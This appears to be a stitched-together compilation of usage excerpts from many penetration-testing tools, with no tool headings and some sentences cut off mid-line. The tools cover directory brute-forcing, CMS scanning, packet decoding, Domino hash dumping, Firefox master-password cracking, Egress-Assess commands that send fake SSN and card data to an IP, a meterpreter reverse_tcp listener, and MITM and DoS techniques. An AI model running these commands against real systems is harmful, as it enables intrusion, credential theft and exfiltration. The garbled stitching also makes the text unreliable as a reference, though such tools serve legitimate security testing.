% time ./dharma.py -grammars grammars/webcrypto.dg -count 10000 > /dev/null

%%% comment

%const% name := value

%section% := value
%section% := variable
%section% := variance

%range%(0-9)
%range%(0.0-9.0)
%range%(a-z)
%range%(!-~)
%range%(0x100-0x200)

%repeat%(+variable+)
%repeat%(+variable+, ", ")

%uri%(path)
%uri%(lookup_key)

%block%(path)

%choice%(foo, "bar", 1)

digit :=
    %range%(0-9)

sign :=
    +
    -

value :=
    +sign+%repeat%(+digit+)

+value+

variable :=
    @variable@ = new Foo();

value :=
    !variable!.bar();

value :=
    attribute=+common:number+

foo :=
    Random.pick([0,1]);

• Windows XP/7/8
• GNU/Linux
• MacOSX

• Multithreaded
• Keep alive connections
• Support for multiple extensions (-e|--extensions asp,php)
• Reporting (plain text, JSON)
• Detect not found web pages when 404 not found errors are masked (.htaccess, web.config, etc).
• Recursive brute forcing
• HTTP(S) proxy support
• Batch processing (-L)

• Scan www.example.com/admin/ to find php files:
  

  python3 dirs3arch.py -u http://www.example.com/admin/ -e php

• Scan www.example.com to find asp and aspx files with SSL:
  

  python3 dirs3arch.py -u https://www.example.com/ -e asp,aspx

• Scan www.example.com with an alternative dictionary (from DirBuster):
  

  python3 dirs3arch.py -u http://www.example.com/ -e php -w db/dirbuster/directory-list-2.3-small.txt

• Scan with HTTP proxy (localhost port 8080):
  

  python3 dirs3arch.py -u http://www.example.com/admin/ -e php --http-proxy localhost:8080

• Scan with custom User-Agent and custom header (Referer):
  

  python3 dirs3arch.py -u http://www.example.com/admin/ -e php --user-agent "My User-Agent" --header "Referer: www.google.com"

• Scan recursively:
  

  python3 dirs3arch.py -u http://www.example.com/admin/ -e php -r

• Scan recursively excluding server-status directory and 200 status codes:
  

  python3 dirs3arch.py -u http://www.example.com/ -e php -r --exclude-subdir "server-status" --exclude-status 200

• Scan includes, classes directories in /admin/
  

  python3 dirs3arch.py -u http://www.example.com/admin/ -e php --scan-subdir "includes, classes"

• Scan without following HTTP redirects:
  

  python3 dirs3arch.py -u http://www.example.com/ -e php --no-follow-redirects

• Scan VHOST "backend" at IP 192.168.1.1:
  

  python3 dirs3arch.py -u http://backend/ --ip 192.168.1.1

• Scan www.example.com to find wordpress plugins:
  

  python3 dirs3arch.py -u http://www.example.com/wordpress/wp-content/plugins/ -e php -w db/wordpress/plugins.txt

  
  
• Batch processing:
  

  python3 dirs3arch.py -L urllist.txt -e php

  
  

• colorama
• oset
• urllib3
• sqlmap

• 0.3.0 - 2015.2.5 Fixed issue3, fixed timeout exception, ported to python33, other bugfixes
• 0.2.7 - 2014.11.21 Added Url List feature (-L). Changed output. Minor Fixes
• 0.2.6 - 2014.9.12 Fixed bug when dictionary size is greater than threads count. Fixed URL encoding bug (issue2).
• 0.2.5 - 2014.9.2 Shows Content-Length in output and reports, added default.conf file (for setting defaults) and report auto save feature added.
• 0.2.4 - 2014.7.17 Added Windows support, --scan-subdir|--scan-subdirs argument added, --exclude-subdir|--exclude-subdirs added, --header argument added, dirbuster dictionaries added, fixed some concurrency bugs, MVC refactoring
• 0.2.3 - 2014.7.7 Fixed some bugs, minor refactorings, exclude status switch, "pause/next directory" feature, changed help structure, expaded default dictionary
• 0.2.2 - 2014.7.2 Fixed some bugs, showing percentage of tested paths and added report generation feature
• 0.2.1 - 2014.5.1 Fixed some bugs and added recursive option
• 0.2.0 - 2014.1.31 Initial public release

• git clone git://github.com/leebaird/discover.git /opt/discover/
• All scripts must be ran from this location.
• cd /opt/discover/
• ./setup.sh
• ./discover.sh

RECON
1.  Domain
2.  Person
3.  Parse salesforce

SCANNING
4.  Generate target list
5.  CIDR
6.  List
7.  IP or domain

WEB
8.  Open multiple tabs in Iceweasel
9.  Nikto
10. SSL

MISC
11. Crack WiFi
12. Parse XML
13. Start a Metasploit listener
14. Update
15. Exit

RECON

1.  Passive
2.  Active
3.  Previous menu

• Passive combines goofile, goog-mail, goohost, theHarvester, Metasploit, dnsrecon, URLCrazy, Whois and multiple webistes.
• Active combines Nmap, dnsrecon, Fierce, lbd, WAF00W, traceroute and Whatweb.

RECON

First name:
Last name:

• Combines info from multiple websites.

Create a free account at salesforce (https://connect.data.com/login).
Perform a search on your target company > select the company name > see all.
Copy the results into a new file.

Enter the location of your list: 

• Gather names and positions into a clean list.

SCANNING

1.  Local area network
2.  NetBIOS
3.  netdiscover
4.  Ping sweep
5.  Previous menu

• Use different tools to create a target list including Angry IP Scanner, arp-scan, netdiscover and nmap pingsweep.

Type of scan: 

1.  External
2.  Internal
3.  Previous menu

• External scan will set the nmap source port to 53 and the max-rrt-timeout to 1500ms.
• Internal scan will set the nmap source port to 88 and the max-rrt-timeout to 500ms.
• Nmap is used to perform host discovery, port scanning, service enumeration and OS identification.
• Matching nmap scripts are used for additional enumeration.
• Matching Metasploit auxiliary modules are also leveraged.

Open multiple tabs in Iceweasel with:

1.  List
2.  Directories from a domain's robot.txt.
3.  Previous menu

• Use a list containing IPs and/or URLs.
• Use wget to pull a domain's robot.txt file, then open all of the directories.

Run multiple instances of Nikto in parallel.

1.  List of IPs.
2.  List of IP:port.
3.  Previous menu

Check for SSL certificate issues.

Enter the location of your list: 

• Use sslscan and sslyze to check for SSL/TLS certificate issues.

• Crack wireless networks.

Parse XML to CSV.

1.  Burp (Base64)
2.  Nessus
3.  Nexpose
4.  Nmap
5.  Qualys
6.  Previous menu

• Setup a multi/handler with a windows/meterpreter/reverse_tcp payload on port 443.

• Use to update Kali Linux, Discover scripts, various tools and the locate database.

Usage

Fingerprinting

--url

Reverse Bruteforce

-U

-p

--bruteforce

Dump Hashes

--hashdump

Quick Console

--quickconsole

exit

Examples

Fingerprint Domino server

python domi-owned.py --url http://domino-server.com

Preform a reverse bruteforce attack

python domi-owned.py --url http://domino-server.com -U ./usernames.txt -p password --bruteforce

Dump Domino account hashes

python domi-owned.py --url http://domino-server.com -u user -p password --hashdump

Interact with the Domino Quick Console

python domi-owned.py --url http://domino-server.com -u user -p password --quickconsole

• Detect misconfigurations and vulnerabilities in OS, server applications, network services, and protocols
• Assess security of detected devices (routers, hardware firewalls, switches and printers)
• Scan for trojans, backdoors, rootkits, and other malware that can be detected remotely
• Test for weak passwords on FTP, IMAP, SQL servers, POP3, Socks, SSH, Telnet
• Check for DNS server vulnerabilities such as Open Zone Transfer, Open Recursion and Cache Poisoning
• Test FTP access such as anonymous access potential and a list of writable FTP directories
• Check for badly configured Proxy Servers, weak SNMP Community Strings, weak SSL ciphers and many other security weaknesses.

• Drupal.
• SilverStripe.

• Wordpress.
• Joomla.

computer:~/droopescan$ droopescan scan drupal -u http://example.org/ -t 8
[+] No themes found.

[+] Possible interesting urls found:
    Default changelog file - https://www.example.org/CHANGELOG.txt
    Default admin - https://www.example.org/user/login

[+] Possible version(s):
    7.34

[+] Plugins found:
    views https://www.example.org/sites/all/modules/views/
        https://www.example.org/sites/all/modules/views/README.txt
        https://www.example.org/sites/all/modules/views/LICENSE.txt
    token https://www.example.org/sites/all/modules/token/
        https://www.example.org/sites/all/modules/token/README.txt
        https://www.example.org/sites/all/modules/token/LICENSE.txt
    pathauto https://www.example.org/sites/all/modules/pathauto/
        https://www.example.org/sites/all/modules/pathauto/README.txt
        https://www.example.org/sites/all/modules/pathauto/LICENSE.txt
        https://www.example.org/sites/all/modules/pathauto/API.txt
    libraries https://www.example.org/sites/all/modules/libraries/
        https://www.example.org/sites/all/modules/libraries/CHANGELOG.txt
        https://www.example.org/sites/all/modules/libraries/README.txt
        https://www.example.org/sites/all/modules/libraries/LICENSE.txt
    entity https://www.example.org/sites/all/modules/entity/
        https://www.example.org/sites/all/modules/entity/README.txt
        https://www.example.org/sites/all/modules/entity/LICENSE.txt
    google_analytics https://www.example.org/sites/all/modules/google_analytics/
        https://www.example.org/sites/all/modules/google_analytics/README.txt
        https://www.example.org/sites/all/modules/google_analytics/LICENSE.txt
    ctools https://www.example.org/sites/all/modules/ctools/
        https://www.example.org/sites/all/modules/ctools/CHANGELOG.txt
        https://www.example.org/sites/all/modules/ctools/LICENSE.txt
        https://www.example.org/sites/all/modules/ctools/API.txt
    features https://www.example.org/sites/all/modules/features/
        https://www.example.org/sites/all/modules/features/CHANGELOG.txt
        https://www.example.org/sites/all/modules/features/README.txt
        https://www.example.org/sites/all/modules/features/LICENSE.txt
        https://www.example.org/sites/all/modules/features/API.txt
    [... snip for README ...]

[+] Scan finished (0:04:59.502427 elapsed)

droopescan --help
droopescan scan --help

• is fast
• is stable
• is up to date
• allows simultaneous scanning of multiple sites
• is 100% python

apt-get install python-pip
pip install droopescan

git clone https://github.com/droope/droopescan.git
cd droopescan
pip install -r requirements.txt
droopescan scan --help

• p -- Plugin checks: Performs several thousand HTTP requests and returns a listing of all plugins found to be installed in the target host.
• t -- Theme checks: As above, but for themes.
• v -- Version checks: Downloads several files and, based on the checksums of these files, returns a list of all possible versions.
• i -- Interesting url checks: Checks for interesting urls (admin panels, readme files, etc.)

    droopescan scan drupal -u example.org

    droopescan scan -u example.org

    droopescan scan drupal -U list_of_urls.txt

    droopescan scan -U list_of_urls.txt

http://localhost/drupal/6.0/
http://localhost/drupal/6.1/
http://localhost/drupal/6.10/
http://localhost/drupal/6.11/
http://localhost/drupal/6.12/

192.168.1.1 example.org
http://192.168.1.1/ example.org
http://192.168.1.2/drupal/  example.org

export http_proxy='user:password@localhost:8080'
export https_proxy='user:password@localhost:8080'
droopescan scan drupal --url http://localhost/drupal

machine secret.google.com
    login admin@google.com
    password Winter01

{
  "themes": {
    "is_empty": true,
    "finds": [

    ]
  },
  "interesting urls": {
    "is_empty": false,
    "finds": [
      {
        "url": "https:\/\/www.drupal.org\/CHANGELOG.txt",
        "description": "Default changelog file."
      },
      {
        "url": "https:\/\/www.drupal.org\/user\/login",
        "description": "Default admin."
      }
    ]
  },
  "version": {
    "is_empty": false,
    "finds": [
      "7.29",
      "7.30",
      "7.31"
    ]
  },
  "plugins": {
    "is_empty": false,
    "finds": [
      {
        "url": "https:\/\/www.drupal.org\/sites\/all\/modules\/views\/",
        "name": "views"
      },
      [...snip...]
    ]
  }
}

    $ droopescan scan drupal -U six_and_above.txt -e v
    {"host": "http://localhost/drupal-7.6/", "version": {"is_empty": false, "finds": ["7.6"]}}
    {"host": "http://localhost/drupal-7.7/", "version": {"is_empty": false, "finds": ["7.7"]}}
    {"host": "http://localhost/drupal-7.8/", "version": {"is_empty": false, "finds": ["7.8"]}}
    {"host": "http://localhost/drupal-7.9/", "version": {"is_empty": false, "finds": ["7.9"]}}
    {"host": "http://localhost/drupal-7.10/", "version": {"is_empty": false, "finds": ["7.10"]}}
    {"host": "http://localhost/drupal-7.11/", "version": {"is_empty": false, "finds": ["7.11"]}}
    {"host": "http://localhost/drupal-7.12/", "version": {"is_empty": false, "finds": ["7.12"]}}
    {"host": "http://localhost/drupal-7.13/", "version": {"is_empty": false, "finds": ["7.13"]}}
    {"host": "http://localhost/drupal-7.14/", "version": {"is_empty": false, "finds": ["7.14"]}}
    {"host": "http://localhost/drupal-7.15/", "version": {"is_empty": false, "finds": ["7.15"]}}
    {"host": "http://localhost/drupal-7.16/", "version": {"is_empty": false, "finds": ["7.16"]}}
    {"host": "http://localhost/drupal-7.17/", "version": {"is_empty": false, "finds": ["7.17"]}}
    {"host": "http://localhost/drupal-7.18/", "version": {"is_empty": false, "finds": ["7.18"]}}
    {"host": "http://localhost/drupal-7.19/", "version": {"is_empty": false, "finds": ["7.19"]}}
    {"host": "http://localhost/drupal-7.20/", "version": {"is_empty": false, "finds": ["7.20"]}}
    {"host": "http://localhost/drupal-7.21/", "version": {"is_empty": false, "finds": ["7.21"]}}
    {"host": "http://localhost/drupal-7.22/", "version": {"is_empty": false, "finds": ["7.22"]}}
    {"host": "http://localhost/drupal-7.23/", "version": {"is_empty": false, "finds": ["7.23"]}}
    {"host": "http://localhost/drupal-7.24/", "version": {"is_empty": false, "finds": ["7.24"]}}
    {"host": "http://localhost/drupal-7.25/", "version": {"is_empty": false, "finds": ["7.25"]}}
    {"host": "http://localhost/drupal-7.26/", "version": {"is_empty": false, "finds": ["7.26"]}}
    {"host": "http://localhost/drupal-7.27/", "version": {"is_empty": false, "finds": ["7.27"]}}
    {"host": "http://localhost/drupal-7.28/", "version": {"is_empty": false, "finds": ["7.28"]}}
    {"host": "http://localhost/drupal-7.29/", "version": {"is_empty": false, "finds": ["7.29"]}}
    {"host": "http://localhost/drupal-7.30/", "version": {"is_empty": false, "finds": ["7.30"]}}
    {"host": "http://localhost/drupal-7.31/", "version": {"is_empty": false, "finds": ["7.31"]}}
    {"host": "http://localhost/drupal-7.32/", "version": {"is_empty": false, "finds": ["7.32"]}}
    {"host": "http://localhost/drupal-7.33/", "version": {"is_empty": false, "finds": ["7.33"]}}
    {"host": "http://localhost/drupal-7.34/", "version": {"is_empty": false, "finds": ["7.34"]}}

• Robust stream reassembly
• IPv4 and IPv6 support
• Custom output handlers
• Chainable decoders

• Linux (developed on Ubuntu 12.04)
• Python 2.7
• pygeoip, GNU Lesser GPL
  • MaxMind GeoIP Legacy datasets
• PyCrypto, custom license
• dpkt, New BSD License
• IPy, BSD 2-Clause License
• pypcap, New BSD License

1. Install all of the necessary Python modules listed above. Many of them are available via pip and/or apt-get. Pygeoip is not yet available as a package and must be installed with pip or manually. All except dpkt are available with pip.
   1. sudo apt-get install python-crypto python-dpkt python-ipy python-pypcap
   2. sudo pip install pygeoip
2. Configure pygeoip by moving the MaxMind data files (GeoIP.dat, GeoIPv6.dat, GeoIPASNum.dat, GeoIPASNumv6.dat) to /share/GeoIP/
3. Run make. This will build Dshell.
4. Run ./dshell. This is Dshell. If you get a Dshell> prompt, you're good to go!

• decode -l
  • This will list all available decoders alongside basic information about them
• decode -h
  • Show generic command-line flags available to most decoders
• decode -d <decoder>
  • Display information about a decoder, including available command-line flags
• decode -d <decoder> <pcap>
  • Run the selected decoder on a pcap file

Dshell> decode -d dns ~/pcap/dns.cap
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 39867 PTR? 66.192.9.104 / PTR: 66-192-9-104.gen.twtelecom.net **
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 30144 A? www.netbsd.org / A: 204.152.190.12 (ttl 82159s) **
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 61652 AAAA? www.netbsd.org / AAAA: 2001:4f8:4:7:2e0:81ff:fe52:9a6b (ttl 86400s) **
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 32569 AAAA? www.netbsd.org / AAAA: 2001:4f8:4:7:2e0:81ff:fe52:9a6b (ttl 86340s) **
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 36275 AAAA? www.google.com / CNAME: www.l.google.com **
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 9837 AAAA? www.example.notginh / NXDOMAIN **
dns 2005-03-30 03:52:17    192.168.170.8:32796 <-   192.168.170.20:53    ** 23123 PTR? 127.0.0.1 / PTR: localhost **
dns 2005-03-30 03:52:25   192.168.170.56:1711  <-      217.13.4.24:53    ** 30307 A? GRIMM.utelsystems.local / NXDOMAIN **
dns 2005-03-30 03:52:17   192.168.170.56:1710  <-      217.13.4.24:53    ** 53344 A? GRIMM.utelsystems.local / NXDOMAIN **

Dshell> decode -d followstream ~/pcap/v6-http.cap
Connection 1 (TCP)
Start: 2007-08-05 19:16:44.189852 UTC
  End: 2007-08-05 19:16:44.204687 UTC
2001:6f8:102d:0:2d0:9ff:fee3:e8de:59201 -> 2001:6f8:900:7c0::2:80 (240 bytes)
2001:6f8:900:7c0::2:80 -> 2001:6f8:102d:0:2d0:9ff:fee3:e8de:59201 (2259 bytes)

GET / HTTP/1.0
Host: cl-1985.ham-01.de.sixxs.net
Accept: text/html, text/plain, text/css, text/sgml, */*;q=0.01
Accept-Encoding: gzip, bzip2
Accept-Language: en
User-Agent: Lynx/2.8.6rel.2 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8b

HTTP/1.1 200 OK
Date: Sun, 05 Aug 2007 19:16:44 GMT
Server: Apache
Content-Length: 2121
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
<pre><img src="/icons/blank.gif" alt="Icon "> <a href="?C=N;O=D">Name</a>                    <a href="?C=M;O=A">Last modified</a>      <a href="?C=S;O=A">Size</a>  <a href="?C=D;O=A">Description</a><hr><img src="/icons/folder.gif" alt="[DIR]"> <a href="202-vorbereitung/">202-vorbereitung/</a>       06-Jul-2007 14:31    -   
<img src="/icons/layout.gif" alt="[   ]"> <a href="Efficient_Video_on_demand_over_Multicast.pdf">Efficient_Video_on_d..&gt;</a> 19-Dec-2006 03:17  291K  
<img src="/icons/unknown.gif" alt="[   ]"> <a href="Welcome%20Stranger!!!">Welcome Stranger!!!</a>     28-Dec-2006 03:46    0   
<img src="/icons/text.gif" alt="[TXT]"> <a href="barschel.htm">barschel.htm</a>            31-Jul-2007 02:21   44K  
<img src="/icons/folder.gif" alt="[DIR]"> <a href="bnd/">bnd/</a>                    30-Dec-2006 08:59    -   
<img src="/icons/folder.gif" alt="[DIR]"> <a href="cia/">cia/</a>                    28-Jun-2007 00:04    -   
<img src="/icons/layout.gif" alt="[   ]"> <a href="cisco_ccna_640-801_command_reference_guide.pdf">cisco_ccna_640-801_c..&gt;</a> 28-Dec-2006 03:48  236K  
<img src="/icons/folder.gif" alt="[DIR]"> <a href="doc/">doc/</a>                    19-Sep-2006 01:43    -   
<img src="/icons/folder.gif" alt="[DIR]"> <a href="freenetproto/">freenetproto/</a>           06-Dec-2006 09:00    -   
<img src="/icons/folder.gif" alt="[DIR]"> <a href="korrupt/">korrupt/</a>                03-Jul-2007 11:57    -   
<img src="/icons/folder.gif" alt="[DIR]"> <a href="mp3_technosets/">mp3_technosets/</a>         04-Jul-2007 08:56    -   
<img src="/icons/text.gif" alt="[TXT]"> <a href="neues_von_rainald_goetz.htm">neues_von_rainald_go..&gt;</a> 21-Mar-2007 23:27   31K  
<img src="/icons/text.gif" alt="[TXT]"> <a href="neues_von_rainald_goetz0.htm">neues_von_rainald_go..&gt;</a> 21-Mar-2007 23:29   36K  
<img src="/icons/layout.gif" alt="[   ]"> <a href="pruef.pdf">pruef.pdf</a>               28-Dec-2006 07:48   88K  
<hr></pre>
</body></html>

Dshell> decode -d country+netflow --country_code=JP ~/pcap/SkypeIRC.cap
2006-08-25 19:32:20.651502       192.168.1.2 ->  202.232.205.123  (-- -> JP)  UDP   60583   33436     1      0       36        0  0.0000s
2006-08-25 19:32:20.766761       192.168.1.2 ->  202.232.205.123  (-- -> JP)  UDP   60583   33438     1      0       36        0  0.0000s
2006-08-25 19:32:20.634046       192.168.1.2 ->  202.232.205.123  (-- -> JP)  UDP   60583   33435     1      0       36        0  0.0000s
2006-08-25 19:32:20.747503       192.168.1.2 ->  202.232.205.123  (-- -> JP)  UDP   60583   33437     1      0       36        0  0.0000s

Dshell> decode -d netflow ~/pcap/vlan.cap
1999-11-05 18:20:43.170500    131.151.20.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:42.063074     131.151.32.71 ->   131.151.32.255  (US -> US)  UDP     138     138     1      0      201        0  0.0000s
1999-11-05 18:20:43.096540     131.151.1.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:43.079765     131.151.5.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:41.521798    131.151.104.96 ->  131.151.107.255  (US -> US)  UDP     137     137     3      0      150        0  1.5020s
1999-11-05 18:20:43.087010     131.151.6.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:43.368210   131.151.111.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:43.250410    131.151.32.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:43.115330    131.151.10.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:43.375145   131.151.115.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:43.363348   131.151.107.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:40.112031      131.151.5.55 ->    131.151.5.255  (US -> US)  UDP     138     138     1      0      201        0  0.0000s
1999-11-05 18:20:43.183825     131.151.32.79 ->   131.151.32.255  (US -> US)  UDP     138     138     1      0      201        0  0.0000s

1. Install pyftpdlib
2. Generate a server certificate and store it as "server.pem" on the same level as Egress-Assess. This can be done with the following command:

./Egress-Assess.py --server ftp --username testuser --password pass123

./Egress-Assess.py --client ftp --username testuser --password pass123 --ip 192.168.63.149 --datatype ssn

./Egress-Assess.py --server https

./Egress-Assess.py --client https --data-size 15 --ip 192.168.63.149 --datatype cc

• MITM over IPv4 networks with ARP Spoofing and DHCP ACK Injection.
• MITM on IPv6 networks with Neighbor Advertisement Spoofing, SLAAC attack, fake DHCPv6.
• DoS (Denial of Service) on IPv4 networks with ARP Spoofing.
• DoS (Denial of Service) on IPv6 networks with SLAAC DoS.
• DNS Hijacking.

• Windows XP or later.
• .NET Framework 4 or later.
• Winpcap library (http://www.winpcap.org)

• ARP Spoofing: Consists in sending ARP messages to the Ethernet network. Normally the objective is to associate the MAC address of the attacker with the IP of another device. Any traffic directed to the IP address of the predetermined link gate will be erroneously sent to the attacker instead of its real destination.
• DHCP ACK Injection: Consists in an attacker monitoring the DHCP exchanges and, at some point during the communication, sending a packet to modify its behavior. Evil Foca converts the machine in a fake DHCP server on the network.
• Neighbor Advertisement Spoofing: The principle of this attack is identical to that of ARP Spoofing, with the difference being in that IPv6 doesn’t work with the ARP protocol, but that all information is sent through ICMPv6 packets. There are five types of ICMPv6 packets used in the discovery protocol and Evil Foca generates this type of packets, placing itself between the gateway and victim.
• SLAAC attack: The objective of this type of attack is to be able to execute an MITM when a user connects to Internet and to a server that does not include support for IPv6 and to which it is therefore necessary to connect using IPv4. This attack is possible due to the fact that Evil Foca undertakes domain name resolution once it is in the communication media, and is capable of transforming IPv4 addresses in IPv6.
• Fake DHCPv6 server: This attack involves the attacker posing as the DCHPv6 server, responding to all network requests, distributing IPv6 addresses and a false DNS to manipulate the user destination or deny the service.
• Denial of Service (DoS) attack: The DoS attack is an attack to a system of machines or network that results in a service or resource being inaccessible for its users. Normally it provokes the loss of network connectivity due to consumption of the bandwidth of the victim’s network, or overloads the computing resources of the victim’s system.
• DoS attack in IPv4 with ARP Spoofing: This type of DoS attack consists in associating a nonexistent MAC address in a victim’s ARP table. This results in rendering the machine whose ARP table has been modified incapable of connecting to the IP address associated to the nonexistent MAC.
• DoS attack in IPv6 with SLAAC attack: In this type of attack a large quantity of “router advertisement” packets are generated, destined to one or several machines, announcing false routers and assigning a different IPv6 address and link gate for each router, collapsing the system and making machines unresponsive.
• DNS Hijacking: The DNS Hijacking attack or DNS kidnapping consists in altering the resolution of the domain names system (DNS). This can be achieved using malware that invalidates the configuration of a TCP/IP machine so that it points to a pirate DNS server under the attacker’s control, or by way of an MITM attack, with the attacker being the party who receives the DNS requests, and responding himself or herself to a specific DNS request to direct the victim toward a specific destination selected by the attacker.

• Can process incoming and outgoing traffic
• Can trigger block script if certain IP loads network with a large amount of packets/bytes/flows per second
• Could announce blocked IPs to BGP router with ExaBGP
• Have integration with Graphite
• netmap support (open source; wire speed processing; only Intel hardware NICs or any hypervisor VM type)
• Supports L2TP decapsulation, VLAN untagging and MPLS processing in mirror mode
• Can work on server/soft-router
• Can detect DoS/DDoS in 1-2 seconds
• Tested up to 10GE with 5-6 Mpps on Intel i7 2600 with Intel Nic 82599
• Complete plugin support
• Have complete support for most popular attack types

• Linux (Debian 6/7/8, CentOS 6/7, Ubuntu 12+)
• FreeBSD 9, 10, 11
• Mac OS X Yosemite

• Discovers all devices connected to a Wi-Fi network. Unlimited devices and unlimited networks, for free! 
• Displays MAC Address and device manufacturer.
• Enter your own names, icons, notes and location
• Full search by IP, MAC, Name, Vendor and Notes 
• History of all discovered networks. 
• Share via Twitter, Facebook, Message and E-mail
• Service Scan: Find hundreds of open ports in a few seconds.
• Wake On LAN: Switch on your devices from your mobile or tablet! 
• Ping and traceroute: Understand your network performances.
• Automatic DNS lookup and reverse lookup
• Checks the availability of Internet connection
• Works also with hosts outside your local network 
• Tracks when a device has gone online or offline
• Launch Apps for specific ports, such as Browser, SSH, FTP 
• Displays NetBIOS names and properties
• Displays Bonjour info and properties
• Supports identification by IP address for bridged networks
• Sort by IP, MAC, Name, Vendor, State, Last Change. 
• Free of charge, no banner Ads 
• Available for iPhone, iPad and iPod Touch with retina and standard displays.
• Integrates with Fingbox to sync and backup your customizations, merge networks with multiple access points, monitor remote networks via Fingbox Sentinels, get notifications of changes, and much more. 
• Fing is available on several other platforms, including Windows, OS X and Linux. Check them out!

• Field Name
• Value
• Total Used Count
• First Used Date
• Last Used Date

• Instantly view all the autocomplete data from Firefox form history file
• On startup, it auto detects Autocomplete file from default profile location
• Sort feature to arrange the data in various order to make it easier to search through 100's of entries.
• Delete all the Autocomplete data with just a click of button
• Save the displayed autocomplete list to HTML/XML/TEXT/CSV file
• Easier and faster to use with its enhanced user friendly GUI interface
• Fully Portable, does not require any third party components like JAVA, .NET etc
• Support for local Installation and uninstallation of the software

• Launch FirefoxAutocompleteSpy on your system
• By default it will automatically find and display the autocomplete file from default profile location. You can also select the desired file manually.
• Next click on 'Show All' button and all stored Autocomplete data will be displayed in the list as shown in screenshot 1 below.
• If you want to remove all the entries, click on 'Delete All' button below.
• Finally you can save all displayed entries to HTML/XML/TEXT/CSV file by clicking on 'Export' button and then select the type of file from the drop down box of 'Save File Dialog'.

• FireMaster generates passwords on the fly through various methods.
• Then it computes the hash of the password using known algorithm.
• Next this password hash is used to decrypt the encrypted data for known plain text (i.e. "password-check").
• Now if the decrypted string matches with the known plain text (i.e. "password-check") then the generated password is the master password.

Firemaster [-q]
           [-d -f ]
           [-h -f  -n  -g "charlist" [ -s | -p ] ]
           [-b -m  -l  -c "charlist" -p "pattern" ]
           

Note: With v5.0 onwards, you can specify 'auto' (without quotes) in place of "" to automatically detect default profile path.
 
Dictionary Crack Options:
   -d  Perform dictionary crack
   -f  Dictionary file with words on each line
    
Hybrid Crack Options:
   -h  Perform hybrid crack operation using dictionary passwords.
Hybrid crack can find passwords like pass123, 123pass etc
   -f  Dictionary file with words on each line
   -g  Group of characters used for generating the strings
   -n  Maximum length of strings to be generated using above character list
These strings are added to the dictionary word to form the password
   -s  Suffix the generated characters to the dictionary word(pass123)
   -p  Prefix the generated characters to the dictionary word(123pass)
    
Brute Force Crack Options:
   -b  Perform brute force crack
   -c  Character list used for brute force cracking process
   -m  [Optional] Specify the minimum length of password
   -l  Specify the maximum length of password
   -p   [Optional] Specify the pattern for the password

// Dictionary Crack
FireMaster.exe -d -f c:\dictfile.txt auto
 
// Hybrid Crack
FireMaster.exe -h -f c:\dictfile.txt -n 3 -g "123" -s auto
 
 // Brute-force Crack
FireMaster.exe -q -b -m 3 -l 10 -c "abcdetps123" "c:\my test\firefox"
 
 // Brute-force Crack with Pattern
FireMaster.exe -q -b -m 3 -c "abyz126" -l 10 -p "pa??f??123" auto

• Instantly decrypt and recover stored encrypted passwords from 'Firefox Sign-on Secret Store' for all versions of Firefox.
• Recover Passwords from Mozilla based SeaMonkey browser also.
• Supports recovery of passwords from local system as well as remote system. User can specify Firefox profile location from the remote system to recover the passwords.
• It can recover passwords from Firefox secret store even when it is protected with master password. In such case user have to enter the correct master password to successfully decrypt the sign-on passwords.
• Automatically discovers Firefox profile location based on installed version of Firefox.
• On successful recovery operation, username, password along with a corresponding login website is displayed
• Fully Portable version, can be run from anywhere.
• Integrated Installer for assisting you in local Installation & Uninstallation. 

• -h, --help: It shows the information about using the Flashlight application.
• -p <ProjectName> or --project < ProjectName>: It sets project name with the name given. This paramater can be used to save different projects in different workspaces.
• -s <ScanType> or –scan_type < ScanType >: It sets the type of scans. There are four types of scans: Active Scan , Passive Scan, Screenshot Scan and Filtering. These types of scans will be examined later in detail.
• -d < DestinationNetwork>, --destination < DestinationNetwork >: It sets the network or IP where the scan will be executed against.
• -c <FileName>, --config <FileName>: It specifies the configuration file. The scanning is realized according to the information in the configuration file.
• -u <NetworkInterface>, --interface < NetworkInterface>: It sets the network interface used during passive scanning.
• -f <PcapFile>, --pcap_file < PcapFile >: It sets cap File that will be filtered.
• -r <RasterizeFile>, --rasterize < RasterizeFile>: It sets the specific location of Rasterize JavaScript file which will be used for taking screenshots.
• -t <ThreadNumber>, --thread <Threadnember>: It sets the number of Threads. This parameter is valid only on screenshot scanning (screen scan) mode.
• -o <OutputDiectory>, --output < OutputDiectory >: It sets the directory in which the scan results can be saved. The scan results are saved in 3 sub-directories : For Nmap scanning results, "nmap" subdirectory, for PCAP files "pcap" subdirectory and for screenshots "screen" subdirectories are used. Scan results are saved in directory, shown under the output directories by this parameter. If this option is not set, scan results are saved in the directory that Flashlight applications are running.
• -a, --alive: It performs ping scan to
• “-I” parameter is chosen.
• -l <LogFile>, --log < LogFile >: It specifies the log file to save the scan results. If not set, logs are saved in “flashlight.log” file in working directory.
• -k <PassiveTimeout>, --passive_timeout <PassiveTimeout>: It specifies the timeout for sniffing in passive mode. Default value is 15 seconds. This parameter is used for passive scan.
• -m, --mim: It is used to perform MITM attack.
